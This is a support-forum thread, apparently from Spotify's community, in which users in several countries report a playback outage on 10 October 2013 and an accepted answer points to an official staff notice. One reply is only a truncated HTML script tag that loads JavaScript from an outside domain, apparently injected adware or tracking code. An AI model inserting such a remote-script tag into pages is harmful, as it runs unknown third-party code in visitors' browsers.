Announcements

Help Wizard

Step 1

NEXT STEP

Spotify not working on 10th October 2013

Solved!

Spotify not working on 10th October 2013

My spotify does not seem to be working this morning. I am a premium spotify member and have spotify installed on my iPhone. The app shows that spotify is connected to the Internet and that I am getting a full 3G signal, however when I click a song to play. I do not get any sound output and the time bar does not move.

Just to confirm, there is nothing wrong with my phone as I have both played music through iTunes and gone on the Internet through Safari.

Accepted Solutions
Marked as solution

Hey guys!

As all of you noticed, Spotify has some service issues at the moment.

Here is the official staff reply about it, hopefully it will get fixed soon - they are working on it right now!

View solution in original post

35 Replies

Same problem here (on personal computer - Netherlands)

It's not working for me either, most annoying.

I tried to write a message when it stopped working but it wouldn't let me submit it.

I've got the same problem, although I can't even select a song, I've just got a blank screen, and definitely got internet access.

In Spain Too

Same problem on my windows pc and android phone. (netherlands)

not working for me, camn't even select a song to play

Same here (desktop computer).

Spain.

Since this morning I've been unable to reproduce any song, also, it always start "without connection" and it lasts like 5 min to connect, but then nothing is playable.

Not working on my computer and iPhone either. (Netherlands)

Me Too - South Wales. Takes a while to connect but will not play.

Same in Turkey

It doesn't work here too. Music don't play, and "discovers" tag doesn't works... (Spain)

<script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={8D4EA1ED-5CEF-4EBE-928A-B2438A355135}&d=2012-1-31...

still happening in the netherlands

I just started to have the same problem in Germany!!

Spotify, please DO something!  At least let us know you're trying!!

Not working in Berlin neither. It's even worse - I reinstalled it and all my playlist, messages and friends dissapeared... 😞

Hi, I also can't use Spotify currently. When starting up it says "Offline" for a moment. Then the Offline sign disappears, but the Explore-Page just says that it can't be loaded currently and no song will play. Spotify Premium, Desktop Version, Location: Germany

hallo ind germani get nichs  en alemania no va nada que pasa

Same issue here. I was using it last night and it was fine, but this morning I cannot play any tracks that AREN'T already synced to my iPhone (5).

I am at home using our WIFI with full signal - all other apps work fine. I have also restarted my phone and the problem remains.

I am from London, UK.

That sucks! I don't like paying for something that's not working. Hope everybody who's posting here will get a credit entry or spotify premium (if he uses just unlimited) for one month free or something like that....

Same here, not working in Wales (UK)

Suggested posts